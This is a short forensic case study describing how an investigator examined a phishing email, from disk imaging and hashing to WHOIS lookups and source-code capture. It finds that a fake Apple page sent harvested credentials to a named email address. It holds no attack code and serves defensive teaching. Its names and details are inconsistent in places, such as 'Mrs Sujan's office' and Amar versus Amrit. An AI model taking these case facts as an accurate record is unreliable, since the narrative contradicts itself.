CASE STUDY: Website Phishing Attack

1. Case Summary:Mrs. Poornima Rai, working as a Social Media Strategist a firm called 'Next Gen Digital System,' received an email with promotional offer attached to it. She's an intelligent person who always loved listening to music and dating books with coffee. She also has some knowledge about attacks through emails and their effect.Mrs. Pinky Sharma, CEO of’ 'Next Gen Digital System' called up Mr. Amar Chhetri, a certified Computer Forensic Investigator and Expert and asked for his Forensic Services to perform an investigation to verify whether the email was a simple marketing promotion campaign and to start the legal actions with the help of Law and Enforcement Authority. 2. Forensic Methodology:a. Amar Chhetri accepted the investigation task and visited Mrs Sujan’s office one workingday.b. He created bit-stream image of the folder on HDD that contains Outlook .pst files using FTK Imager.c. He also created MD5 Hashes of the image to cross-check the integrity of the file during theinvestigation and court-trial.d. He moved the acquired image file into a folder protected and encrypted by TrueCrypt.e. He prepared Chain-Of-Custody documents and stored the evidence in a forensically secureplace/device.f. Mr. Amar were requested to investigate the following evidences:i. The nature of the site received in the emailii. Behavior of the URL receivediii. Impacts of the programs inside the URLg. He loaded the image file in FTK from password protected folder in TrueCrypt file and secured theloaded contents with encryption and passcode inside it.h. FTK search showed up the reported URL on the mail system loaded through the acquired evidence.i. He verified the Phishing nature of URL using https://phishtank.com, but could not get any anyconfirmatory details or site was not listed on Phishtank’s database.j. He did a DNS analysis of the domain on the URL using www.dnsstuff.com and www.webdnstools.comk. He gathered the registrant details of the domain using SmartWhois andhttp://www.register.com/whois.rcmxl. He also gathered web hosting company details IPNetInfom. He decided to perform forensics analysis of source code in two modes- online and as the additionalacquired evidence.n. He installed Firebug on Firefox and got some suspicious PHP and JavaScript codes on it.o. Further, he installed HTTrack WebSite Copier and acquired the sources code as the additionalevidence.p. In detailed analysis, he found that the URL was programmed to collect username, password andphone number from Apple users and to send them to programmed email address:admin.rajut@gmail.com .q. He prepared a report using MS Word as well as FTK and concluded that URL was Phishing Site ofApple and it has code with malicious intentions. 3. Trials and Prosecution:Based on evidence prepared and produced, the registrant who himself had programmed the site was given punishment 3 years jail-terms under various IT Laws including misuse of electronic communication.

---

Researched and Authored by:Amrit Chhetri, Principal IT Security Consultant, Certified Computer Forensics Investigator/Consultant, CPT, Social Media Consultant